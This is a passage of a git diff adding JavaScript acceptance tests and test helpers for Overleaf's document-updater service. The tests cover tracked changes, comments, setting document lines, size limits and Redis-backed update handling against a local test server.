{ + user_id: this.user_id, + ts: new Date(), + }, + }, + ], + }, + }) + DocUpdaterClient.preloadDoc(this.project_id, this.doc.id, error => { + if (error != null) { + throw error + } + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc.id, + this.update, + error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + } + ) + }) + }) + + it('should have preloaded the existing ranges', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc.id, + (error, res, data) => { + if (error != null) { + throw error + } + const { changes } = data.ranges + changes[0].op.should.deep.equal({ i: '123', p: 1 }) + changes[1].op.should.deep.equal({ i: '456', p: 5 }) + done() + } + ) + }) + + it('should flush the ranges to the persistence layer again', function (done) { + DocUpdaterClient.flushDoc(this.project_id, this.doc.id, error => { + if (error != null) { + throw error + } + MockWebApi.getDocument(this.project_id, this.doc.id, (error, doc) => { + if (error) return done(error) + const { changes } = doc.ranges + changes[0].op.should.deep.equal({ i: '123', p: 1 }) + changes[1].op.should.deep.equal({ i: '456', p: 5 }) + done() + }) + }) + }) + }) + + describe('accepting a change', function () { + beforeEach(function (done) { + sandbox.spy(MockWebApi, 'setDocument') + this.project_id = DocUpdaterClient.randomId() + this.user_id = DocUpdaterClient.randomId() + this.id_seed = '587357bd35e64f6157' + this.doc = { + id: DocUpdaterClient.randomId(), + lines: ['aaa'], + } + this.update = { + doc: this.doc.id, + op: [{ i: '456', p: 1 }], + v: 0, + meta: { user_id: this.user_id, tc: this.id_seed }, + } + MockWebApi.insertDoc(this.project_id, this.doc.id, { + lines: this.doc.lines, + version: 0, + }) + DocUpdaterClient.preloadDoc(this.project_id, this.doc.id, error => { + if (error != null) { + throw error + } + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc.id, + this.update, + error => { + if (error != null) { + throw error + } + setTimeout(() => { + DocUpdaterClient.getDoc( + this.project_id, + this.doc.id, + (error, res, data) => { + if (error != null) { + throw error + } + const { ranges } = data + const change = ranges.changes[0] + change.op.should.deep.equal({ i: '456', p: 1 }) + change.id.should.equal(this.id_seed + '000001') + change.metadata.user_id.should.equal(this.user_id) + done() + } + ) + }, 200) + } + ) + }) + }) + afterEach(function () { + sandbox.restore() + }) + + it('should remove the change after accepting', function (done) { + DocUpdaterClient.acceptChange( + this.project_id, + this.doc.id, + this.id_seed + '000001', + error => { + if (error != null) { + throw error + } + DocUpdaterClient.getDoc( + this.project_id, + this.doc.id, + (error, res, data) => { + if (error != null) { + throw error + } + expect(data.ranges.changes).to.be.undefined + done() + } + ) + } + ) + }) + + it('should persist the ranges after accepting', function (done) { + DocUpdaterClient.flushDoc(this.project_id, this.doc.id, err => { + if (err) return done(err) + DocUpdaterClient.acceptChange( + this.project_id, + this.doc.id, + this.id_seed + '000001', + error => { + if (error != null) { + throw error + } + + DocUpdaterClient.flushDoc(this.project_id, this.doc.id, err => { + if (err) return done(err) + DocUpdaterClient.getDoc( + this.project_id, + this.doc.id, + (error, res, data) => { + if (error != null) { + throw error + } + expect(data.ranges.changes).to.be.undefined + + MockWebApi.setDocument + .calledWith(this.project_id, this.doc.id, ['a456aa'], 1, {}) + .should.equal(true) + done() + } + ) + }) + } + ) + }) + }) + }) + + describe('accepting multiple changes', function () { + beforeEach(function (done) { + this.getHistoryUpdatesSpy = sandbox.spy( + RangesManager, + 'getHistoryUpdatesForAcceptedChanges' + ) + + this.project_id = DocUpdaterClient.randomId() + this.user_id = DocUpdaterClient.randomId() + this.doc = { + id: DocUpdaterClient.randomId(), + lines: ['aaa', 'bbb', 'ccc', 'ddd', 'eee'], + } + + MockWebApi.insertDoc(this.project_id, this.doc.id, { + lines: this.doc.lines, + version: 0, + historyRangesSupport: true, + }) + + DocUpdaterClient.preloadDoc(this.project_id, this.doc.id, error => { + if (error != null) { + throw error + } + + this.id_seed_1 = 'tc_1' + this.id_seed_2 = 'tc_2' + this.id_seed_3 = 'tc_3' + + this.updates = [ + { + doc: this.doc.id, + op: [{ d: 'bbb', p: 4 }], + v: 0, + meta: { + user_id: this.user_id, + tc: this.id_seed_1, + }, + }, + { + doc: this.doc.id, + op: [{ d: 'ccc', p: 5 }], + v: 1, + meta: { + user_id: this.user_id, + tc: this.id_seed_2, + }, + }, + { + doc: this.doc.id, + op: [{ d: 'ddd', p: 6 }], + v: 2, + meta: { + user_id: this.user_id, + tc: this.id_seed_3, + }, + }, + ] + + DocUpdaterClient.sendUpdates( + this.project_id, + this.doc.id, + this.updates, + error => { + if (error != null) { + throw error + } + setTimeout(() => { + DocUpdaterClient.getDoc( + this.project_id, + this.doc.id, + (error, res, data) => { + if (error != null) { + throw error + } + const { ranges } = data + const changeOps = ranges.changes + .map(change => change.op) + .flat() + changeOps.should.deep.equal([ + { d: 'bbb', p: 4 }, + { d: 'ccc', p: 5 }, + { d: 'ddd', p: 6 }, + ]) + done() + } + ) + }, 200) + } + ) + }) + }) + + afterEach(function () { + sandbox.restore() + }) + + it('accepting changes in order', function (done) { + DocUpdaterClient.acceptChanges( + this.project_id, + this.doc.id, + [ + this.id_seed_1 + '000001', + this.id_seed_2 + '000001', + this.id_seed_3 + '000001', + ], + error => { + if (error != null) { + throw error + } + + const historyUpdates = this.getHistoryUpdatesSpy.returnValues[0] + expect(historyUpdates[0]).to.deep.equal({ + doc: this.doc.id, + meta: { + pathname: '/a/b/c.tex', + doc_length: 10, + history_doc_length: 19, + ts: historyUpdates[0].meta.ts, + user_id: this.user_id, + }, + op: [{ p: 4, d: 'bbb' }], + }) + + expect(historyUpdates[1]).to.deep.equal({ + doc: this.doc.id, + meta: { + pathname: '/a/b/c.tex', + doc_length: 10, + history_doc_length: 16, + ts: historyUpdates[1].meta.ts, + user_id: this.user_id, + }, + op: [{ p: 5, d: 'ccc' }], + }) + + expect(historyUpdates[2]).to.deep.equal({ + doc: this.doc.id, + meta: { + pathname: '/a/b/c.tex', + doc_length: 10, + history_doc_length: 13, + ts: historyUpdates[2].meta.ts, + user_id: this.user_id, + }, + op: [{ p: 6, d: 'ddd' }], + }) + + done() + } + ) + }) + + it('accepting changes in reverse order', function (done) { + DocUpdaterClient.acceptChanges( + this.project_id, + this.doc.id, + [ + this.id_seed_3 + '000001', + this.id_seed_2 + '000001', + this.id_seed_1 + '000001', + ], + error => { + if (error != null) { + throw error + } + + const historyUpdates = this.getHistoryUpdatesSpy.returnValues[0] + expect(historyUpdates[0]).to.deep.equal({ + doc: this.doc.id, + meta: { + pathname: '/a/b/c.tex', + doc_length: 10, + history_doc_length: 19, + ts: historyUpdates[0].meta.ts, + user_id: this.user_id, + }, + op: [{ p: 4, d: 'bbb' }], + }) + + expect(historyUpdates[1]).to.deep.equal({ + doc: this.doc.id, + meta: { + pathname: '/a/b/c.tex', + doc_length: 10, + history_doc_length: 16, + ts: historyUpdates[1].meta.ts, + user_id: this.user_id, + }, + op: [{ p: 5, d: 'ccc' }], + }) + + expect(historyUpdates[2]).to.deep.equal({ + doc: this.doc.id, + meta: { + pathname: '/a/b/c.tex', + doc_length: 10, + history_doc_length: 13, + ts: historyUpdates[2].meta.ts, + user_id: this.user_id, + }, + op: [{ p: 6, d: 'ddd' }], + }) + + done() + } + ) + }) + }) + + describe('deleting a comment range', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.user_id = DocUpdaterClient.randomId() + this.doc = { + id: DocUpdaterClient.randomId(), + lines: ['foo bar'], + } + this.update = { + doc: this.doc.id, + op: [{ c: 'bar', p: 4, t: (this.tid = DocUpdaterClient.randomId()) }], + v: 0, + } + MockWebApi.insertDoc(this.project_id, this.doc.id, { + lines: this.doc.lines, + version: 0, + }) + DocUpdaterClient.preloadDoc(this.project_id, this.doc.id, error => { + if (error != null) { + throw error + } + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc.id, + this.update, + error => { + if (error != null) { + throw error + } + setTimeout(() => { + DocUpdaterClient.getDoc( + this.project_id, + this.doc.id, + (error, res, data) => { + if (error != null) { + throw error + } + const { ranges } = data + const change = ranges.comments[0] + change.op.should.deep.equal({ c: 'bar', p: 4, t: this.tid }) + change.id.should.equal(this.tid) + done() + } + ) + }, 200) + } + ) + }) + }) + + it('should remove the comment range', function (done) { + DocUpdaterClient.removeComment( + this.project_id, + this.doc.id, + this.tid, + (error, res) => { + if (error != null) { + throw error + } + expect(res.statusCode).to.equal(204) + DocUpdaterClient.getDoc( + this.project_id, + this.doc.id, + (error, res, data) => { + if (error != null) { + throw error + } + expect(data.ranges.comments).to.be.undefined + done() + } + ) + } + ) + }) + }) + + describe('tripping range size limit', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.user_id = DocUpdaterClient.randomId() + this.id_seed = DocUpdaterClient.randomId() + this.doc = { + id: DocUpdaterClient.randomId(), + lines: ['aaa'], + } + this.i = new Array(3 * 1024 * 1024).join('a') + this.updates = [ + { + doc: this.doc.id, + op: [{ i: this.i, p: 1 }], + v: 0, + meta: { user_id: this.user_id, tc: this.id_seed }, + }, + ] + MockWebApi.insertDoc(this.project_id, this.doc.id, { + lines: this.doc.lines, + version: 0, + }) + const jobs = [] + for (const update of this.updates) { + jobs.push(callback => + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc.id, + update, + callback + ) + ) + } + DocUpdaterClient.preloadDoc(this.project_id, this.doc.id, error => { + if (error != null) { + throw error + } + async.series(jobs, error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + }) + }) + }) + + it('should not update the ranges', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc.id, + (error, res, data) => { + if (error != null) { + throw error + } + const { ranges } = data + expect(ranges.changes).to.be.undefined + done() + } + ) + }) + }) + + describe('deleting text surrounding a comment', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.user_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: ['foo bar baz'], + version: 0, + ranges: { + comments: [ + { + op: { + c: 'a', + p: 5, + tid: (this.tid = DocUpdaterClient.randomId()), + }, + metadata: { + user_id: this.user_id, + ts: new Date(), + }, + }, + ], + }, + }) + this.updates = [ + { + doc: this.doc_id, + op: [{ d: 'foo ', p: 0 }], + v: 0, + meta: { user_id: this.user_id }, + }, + { + doc: this.doc_id, + op: [{ d: 'bar ', p: 0 }], + v: 1, + meta: { user_id: this.user_id }, + }, + ] + const jobs = [] + for (const update of this.updates) { + jobs.push(callback => + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + update, + callback + ) + ) + } + DocUpdaterClient.preloadDoc(this.project_id, this.doc_id, error => { + if (error != null) { + throw error + } + async.series(jobs, function (error) { + if (error != null) { + throw error + } + setTimeout(() => { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, data) => { + if (error != null) { + throw error + } + done() + } + ) + }, 200) + }) + }) + }) + + it('should write a snapshot from before the destructive change', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, data) => { + if (error != null) { + return done(error) + } + db.docSnapshots + .find({ + project_id: new ObjectId(this.project_id), + doc_id: new ObjectId(this.doc_id), + }) + .toArray((error, docSnapshots) => { + if (error != null) { + return done(error) + } + expect(docSnapshots.length).to.equal(1) + expect(docSnapshots[0].version).to.equal(1) + expect(docSnapshots[0].lines).to.deep.equal(['bar baz']) + expect(docSnapshots[0].ranges.comments[0].op).to.deep.equal({ + c: 'a', + p: 1, + tid: this.tid, + }) + done() + }) + } + ) + }) + }) +}) diff --git a/services/document-updater/test/acceptance/js/SettingADocumentTests.js b/services/document-updater/test/acceptance/js/SettingADocumentTests.js new file mode 100644 index 0000000..5b0c4ab --- /dev/null +++ b/services/document-updater/test/acceptance/js/SettingADocumentTests.js @@ -0,0 +1,528 @@ +const sinon = require('sinon') +const { expect } = require('chai') +const Settings = require('@overleaf/settings') +const docUpdaterRedis = require('@overleaf/redis-wrapper').createClient( + Settings.redis.documentupdater +) +const Keys = Settings.redis.documentupdater.key_schema + +const MockProjectHistoryApi = require('./helpers/MockProjectHistoryApi') +const MockWebApi = require('./helpers/MockWebApi') +const DocUpdaterClient = require('./helpers/DocUpdaterClient') +const DocUpdaterApp = require('./helpers/DocUpdaterApp') + +describe('Setting a document', function () { + let numberOfReceivedUpdates = 0 + before(function (done) { + DocUpdaterClient.subscribeToAppliedOps(() => { + numberOfReceivedUpdates++ + }) + this.lines = ['one', 'two', 'three'] + this.version = 42 + this.update = { + doc: this.doc_id, + op: [ + { + i: 'one and a half\n', + p: 4, + }, + ], + v: this.version, + } + this.result = ['one', 'one and a half', 'two', 'three'] + this.newLines = ['these', 'are', 'the', 'new', 'lines'] + this.source = 'dropbox' + this.user_id = 'user-id-123' + + sinon.spy(MockProjectHistoryApi, 'flushProject') + sinon.spy(MockWebApi, 'setDocument') + DocUpdaterApp.ensureRunning(done) + }) + + after(function () { + MockProjectHistoryApi.flushProject.restore() + MockWebApi.setDocument.restore() + }) + + describe('when the updated doc exists in the doc updater', function () { + before(function (done) { + numberOfReceivedUpdates = 0 + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + DocUpdaterClient.preloadDoc(this.project_id, this.doc_id, error => { + if (error) { + throw error + } + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + this.update, + error => { + if (error) { + throw error + } + setTimeout(() => { + DocUpdaterClient.setDocLines( + this.project_id, + this.doc_id, + this.newLines, + this.source, + this.user_id, + false, + (error, res, body) => { + if (error) { + return done(error) + } + this.statusCode = res.statusCode + this.body = body + done() + } + ) + }, 200) + } + ) + }) + }) + + after(function () { + MockProjectHistoryApi.flushProject.resetHistory() + MockWebApi.setDocument.resetHistory() + }) + + it('should return a 200 status code', function () { + this.statusCode.should.equal(200) + }) + + it('should emit two updates (from sendUpdate and setDocLines)', function () { + expect(numberOfReceivedUpdates).to.equal(2) + }) + + it('should send the updated doc lines and version to the web api', function () { + MockWebApi.setDocument + .calledWith(this.project_id, this.doc_id, this.newLines) + .should.equal(true) + }) + + it('should update the lines in the doc updater', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) { + return done(error) + } + doc.lines.should.deep.equal(this.newLines) + done() + } + ) + }) + + it('should bump the version in the doc updater', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) { + return done(error) + } + doc.version.should.equal(this.version + 2) + done() + } + ) + }) + + it('should leave the document in redis', function (done) { + docUpdaterRedis.get( + Keys.docLines({ doc_id: this.doc_id }), + (error, lines) => { + if (error) { + throw error + } + expect(JSON.parse(lines)).to.deep.equal(this.newLines) + done() + } + ) + }) + + it('should return the mongo rev in the json response', function () { + this.body.should.deep.equal({ rev: '123' }) + }) + + describe('when doc has the same contents', function () { + beforeEach(function (done) { + numberOfReceivedUpdates = 0 + DocUpdaterClient.setDocLines( + this.project_id, + this.doc_id, + this.newLines, + this.source, + this.user_id, + false, + (error, res, body) => { + if (error) { + return done(error) + } + this.statusCode = res.statusCode + this.body = body + done() + } + ) + }) + + it('should not bump the version in doc updater', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) { + return done(error) + } + doc.version.should.equal(this.version + 2) + done() + } + ) + }) + + it('should not emit any updates', function (done) { + setTimeout(() => { + expect(numberOfReceivedUpdates).to.equal(0) + done() + }, 100) // delay by 100ms: make sure we do not check too early! + }) + }) + }) + + describe('when the updated doc does not exist in the doc updater', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + numberOfReceivedUpdates = 0 + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + DocUpdaterClient.setDocLines( + this.project_id, + this.doc_id, + this.newLines, + this.source, + this.user_id, + false, + (error, res, body) => { + if (error) { + return done(error) + } + this.statusCode = res.statusCode + this.body = body + setTimeout(done, 200) + } + ) + }) + + after(function () { + MockProjectHistoryApi.flushProject.resetHistory() + MockWebApi.setDocument.resetHistory() + }) + + it('should return a 200 status code', function () { + this.statusCode.should.equal(200) + }) + + it('should emit an update', function () { + expect(numberOfReceivedUpdates).to.equal(1) + }) + + it('should send the updated doc lines to the web api', function () { + MockWebApi.setDocument + .calledWith(this.project_id, this.doc_id, this.newLines) + .should.equal(true) + }) + + it('should flush project history', function () { + MockProjectHistoryApi.flushProject + .calledWith(this.project_id) + .should.equal(true) + }) + + it('should remove the document from redis', function (done) { + docUpdaterRedis.get( + Keys.docLines({ doc_id: this.doc_id }), + (error, lines) => { + if (error) { + throw error + } + expect(lines).to.not.exist + done() + } + ) + }) + + it('should return the mongo rev in the json response', function () { + this.body.should.deep.equal({ rev: '123' }) + }) + }) + + const DOC_TOO_LARGE_TEST_CASES = [ + { + desc: 'when the updated doc is too large for the body parser', + size: Settings.maxJsonRequestSize, + expectedStatusCode: 413, + }, + { + desc: 'when the updated doc is larger than the HTTP controller limit', + size: Settings.max_doc_length, + expectedStatusCode: 406, + }, + ] + + DOC_TOO_LARGE_TEST_CASES.forEach(testCase => { + describe(testCase.desc, function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + this.newLines = [] + while (JSON.stringify(this.newLines).length <= testCase.size) { + this.newLines.push('(a long line of text)'.repeat(10000)) + } + DocUpdaterClient.setDocLines( + this.project_id, + this.doc_id, + this.newLines, + this.source, + this.user_id, + false, + (error, res, body) => { + if (error) { + return done(error) + } + this.statusCode = res.statusCode + setTimeout(done, 200) + } + ) + }) + + after(function () { + MockProjectHistoryApi.flushProject.resetHistory() + MockWebApi.setDocument.resetHistory() + }) + + it(`should return a ${testCase.expectedStatusCode} status code`, function () { + this.statusCode.should.equal(testCase.expectedStatusCode) + }) + + it('should not send the updated doc lines to the web api', function () { + MockWebApi.setDocument.called.should.equal(false) + }) + + it('should not flush project history', function () { + MockProjectHistoryApi.flushProject.called.should.equal(false) + }) + }) + }) + + describe('when the updated doc is large but under the bodyParser and HTTPController size limit', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + + this.newLines = [] + while (JSON.stringify(this.newLines).length < 2 * 1024 * 1024) { + // limit in HTTPController + this.newLines.push('(a long line of text)'.repeat(10000)) + } + this.newLines.pop() // remove the line which took it over the limit + DocUpdaterClient.setDocLines( + this.project_id, + this.doc_id, + this.newLines, + this.source, + this.user_id, + false, + (error, res, body) => { + if (error) { + return done(error) + } + this.statusCode = res.statusCode + this.body = body + setTimeout(done, 200) + } + ) + }) + + after(function () { + MockProjectHistoryApi.flushProject.resetHistory() + MockWebApi.setDocument.resetHistory() + }) + + it('should return a 200 status code', function () { + this.statusCode.should.equal(200) + }) + + it('should send the updated doc lines to the web api', function () { + MockWebApi.setDocument + .calledWith(this.project_id, this.doc_id, this.newLines) + .should.equal(true) + }) + + it('should return the mongo rev in the json response', function () { + this.body.should.deep.equal({ rev: '123' }) + }) + }) + + describe('with track changes', function () { + before(function () { + this.lines = ['one', 'one and a half', 'two', 'three'] + this.id_seed = '587357bd35e64f6157' + this.update = { + doc: this.doc_id, + op: [ + { + d: 'one and a half\n', + p: 4, + }, + ], + meta: { + tc: this.id_seed, + user_id: this.user_id, + }, + v: this.version, + } + }) + + describe('with the undo flag', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + DocUpdaterClient.preloadDoc(this.project_id, this.doc_id, error => { + if (error) { + throw error + } + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + this.update, + error => { + if (error) { + throw error + } + // Go back to old lines, with undo flag + DocUpdaterClient.setDocLines( + this.project_id, + this.doc_id, + this.lines, + this.source, + this.user_id, + true, + (error, res, body) => { + if (error) { + return done(error) + } + this.statusCode = res.statusCode + setTimeout(done, 200) + } + ) + } + ) + }) + }) + + after(function () { + MockProjectHistoryApi.flushProject.resetHistory() + MockWebApi.setDocument.resetHistory() + }) + + it('should undo the tracked changes', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, data) => { + if (error) { + throw error + } + const { ranges } = data + expect(ranges.changes).to.be.undefined + done() + } + ) + }) + }) + + describe('without the undo flag', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + DocUpdaterClient.preloadDoc(this.project_id, this.doc_id, error => { + if (error) { + throw error + } + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + this.update, + error => { + if (error) { + throw error + } + // Go back to old lines, without undo flag + DocUpdaterClient.setDocLines( + this.project_id, + this.doc_id, + this.lines, + this.source, + this.user_id, + false, + (error, res, body) => { + if (error) { + return done(error) + } + this.statusCode = res.statusCode + setTimeout(done, 200) + } + ) + } + ) + }) + }) + + after(function () { + MockProjectHistoryApi.flushProject.resetHistory() + MockWebApi.setDocument.resetHistory() + }) + + it('should not undo the tracked changes', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, data) => { + if (error) { + throw error + } + const { ranges } = data + expect(ranges.changes.length).to.equal(1) + done() + } + ) + }) + }) + }) +}) diff --git a/services/document-updater/test/acceptance/js/SizeCheckTests.js b/services/document-updater/test/acceptance/js/SizeCheckTests.js new file mode 100644 index 0000000..dd48461 --- /dev/null +++ b/services/document-updater/test/acceptance/js/SizeCheckTests.js @@ -0,0 +1,194 @@ +const { expect } = require('chai') +const Settings = require('@overleaf/settings') + +const MockWebApi = require('./helpers/MockWebApi') +const DocUpdaterClient = require('./helpers/DocUpdaterClient') +const DocUpdaterApp = require('./helpers/DocUpdaterApp') + +describe('SizeChecks', function () { + before(function (done) { + DocUpdaterApp.ensureRunning(done) + }) + beforeEach(function () { + this.version = 0 + this.update = { + doc: this.doc_id, + op: [ + { + i: 'insert some more lines that will bring it above the limit\n', + p: 42, + }, + ], + v: this.version, + } + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + }) + + describe('when a doc is above the doc size limit already', function () { + beforeEach(function () { + this.lines = ['x'.repeat(Settings.max_doc_length)] // including the extra newline, this will be over the limit + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + v: this.version, + }) + }) + + it('should error when fetching the doc', function (done) { + DocUpdaterClient.getDoc(this.project_id, this.doc_id, (error, res) => { + if (error) return done(error) + expect(res.statusCode).to.equal(500) + done() + }) + }) + + describe('when trying to update', function () { + beforeEach(function (done) { + const update = { + doc: this.doc_id, + op: this.update.op, + v: this.version, + } + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + update, + error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + } + ) + }) + + it('should still error when fetching the doc', function (done) { + DocUpdaterClient.getDoc(this.project_id, this.doc_id, (error, res) => { + if (error) return done(error) + expect(res.statusCode).to.equal(500) + done() + }) + }) + }) + }) + + describe('when the stringified JSON is above the doc size limit but the doc character count is not', function () { + beforeEach(function () { + let charsRemaining = Settings.max_doc_length + this.lines = [] + // Take the maximum allowed doc length and split it into N lines of 63 characters + a newline. + // The character count will be exactly max_doc_length + // The JSON stringified size will exceed max_doc_length, due to the JSON formatting of the array. + // This document should be allowed, because we use the character count as the limit, not the JSON size. + while (charsRemaining > 0) { + const charstoAdd = Math.min(charsRemaining - 1, 63) // allow for additional newline + this.lines.push('x'.repeat(charstoAdd)) + charsRemaining -= charstoAdd + 1 + } + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + v: this.version, + }) + }) + + it('should be able to fetch the doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + expect(doc.lines).to.deep.equal(this.lines) + done() + } + ) + }) + + describe('when trying to update', function () { + beforeEach(function (done) { + const update = { + doc: this.doc_id, + op: this.update.op, + v: this.version, + } + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + update, + error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + } + ) + }) + + it('should not update the doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + expect(doc.lines).to.deep.equal(this.lines) + done() + } + ) + }) + }) + }) + + describe('when a doc is just below the doc size limit', function () { + beforeEach(function () { + this.lines = ['x'.repeat(Settings.max_doc_length - 1)] // character count is exactly max_doc_length after including the newline + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + v: this.version, + }) + }) + + it('should be able to fetch the doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + expect(doc.lines).to.deep.equal(this.lines) + done() + } + ) + }) + + describe('when trying to update', function () { + beforeEach(function (done) { + const update = { + doc: this.doc_id, + op: this.update.op, + v: this.version, + } + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + update, + error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + } + ) + }) + + it('should not update the doc', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + expect(doc.lines).to.deep.equal(this.lines) + done() + } + ) + }) + }) + }) +}) diff --git a/services/document-updater/test/acceptance/js/helpers/DocUpdaterApp.js b/services/document-updater/test/acceptance/js/helpers/DocUpdaterApp.js new file mode 100644 index 0000000..d34996c --- /dev/null +++ b/services/document-updater/test/acceptance/js/helpers/DocUpdaterApp.js @@ -0,0 +1,42 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const app = require('../../../../app') + +module.exports = { + running: false, + initing: false, + callbacks: [], + ensureRunning(callback) { + if (callback == null) { + callback = function () {} + } + if (this.running) { + return callback() + } else if (this.initing) { + return this.callbacks.push(callback) + } + this.initing = true + this.callbacks.push(callback) + app.listen(3003, '127.0.0.1', error => { + if (error != null) { + throw error + } + this.running = true + return (() => { + const result = [] + for (callback of Array.from(this.callbacks)) { + result.push(callback()) + } + return result + })() + }) + }, +} diff --git a/services/document-updater/test/acceptance/js/helpers/DocUpdaterClient.js b/services/document-updater/test/acceptance/js/helpers/DocUpdaterClient.js new file mode 100644 index 0000000..0a4ec89 --- /dev/null +++ b/services/document-updater/test/acceptance/js/helpers/DocUpdaterClient.js @@ -0,0 +1,246 @@ +let DocUpdaterClient +const Settings = require('@overleaf/settings') +const _ = require('lodash') +const rclient = require('@overleaf/redis-wrapper').createClient( + Settings.redis.documentupdater +) +const keys = Settings.redis.documentupdater.key_schema +const request = require('request').defaults({ jar: false }) +const async = require('async') + +const rclientSub = require('@overleaf/redis-wrapper').createClient( + Settings.redis.pubsub +) +rclientSub.subscribe('applied-ops') +rclientSub.setMaxListeners(0) + +module.exports = DocUpdaterClient = { + randomId() { + let str = '' + for (let i = 0; i < 24; i++) { + str += Math.floor(Math.random() * 16).toString(16) + } + return str + }, + + subscribeToAppliedOps(callback) { + rclientSub.on('message', callback) + }, + + _getPendingUpdateListKey() { + const shard = _.random(0, Settings.dispatcherCount - 1) + if (shard === 0) { + return 'pending-updates-list' + } else { + return `pending-updates-list-${shard}` + } + }, + + sendUpdate(projectId, docId, update, callback) { + rclient.rpush( + keys.pendingUpdates({ doc_id: docId }), + JSON.stringify(update), + error => { + if (error) { + return callback(error) + } + const docKey = `${projectId}:${docId}` + rclient.sadd('DocsWithPendingUpdates', docKey, error => { + if (error) { + return callback(error) + } + + rclient.rpush( + DocUpdaterClient._getPendingUpdateListKey(), + docKey, + callback + ) + }) + } + ) + }, + + sendUpdates(projectId, docId, updates, callback) { + DocUpdaterClient.preloadDoc(projectId, docId, error => { + if (error) { + return callback(error) + } + const jobs = updates.map(update => callback => { + DocUpdaterClient.sendUpdate(projectId, docId, update, callback) + }) + async.series(jobs, err => { + if (err) { + return callback(err) + } + DocUpdaterClient.waitForPendingUpdates(projectId, docId, callback) + }) + }) + }, + + waitForPendingUpdates(projectId, docId, callback) { + async.retry( + { times: 30, interval: 100 }, + cb => + rclient.llen(keys.pendingUpdates({ doc_id: docId }), (err, length) => { + if (err) { + return cb(err) + } + if (length > 0) { + cb(new Error('updates still pending')) + } else { + cb() + } + }), + callback + ) + }, + + getDoc(projectId, docId, callback) { + request.get( + `http://127.0.0.1:3003/project/${projectId}/doc/${docId}`, + (error, res, body) => { + if (body != null && res.statusCode >= 200 && res.statusCode < 300) { + body = JSON.parse(body) + } + callback(error, res, body) + } + ) + }, + + getDocAndRecentOps(projectId, docId, fromVersion, callback) { + request.get( + `http://127.0.0.1:3003/project/${projectId}/doc/${docId}?fromVersion=${fromVersion}`, + (error, res, body) => { + if (body != null && res.statusCode >= 200 && res.statusCode < 300) { + body = JSON.parse(body) + } + callback(error, res, body) + } + ) + }, + + getProjectLastUpdatedAt(projectId, callback) { + request.get( + `http://127.0.0.1:3003/project/${projectId}/last_updated_at`, + (error, res, body) => { + if (body != null && res.statusCode >= 200 && res.statusCode < 300) { + body = JSON.parse(body) + } + callback(error, res, body) + } + ) + }, + + preloadDoc(projectId, docId, callback) { + 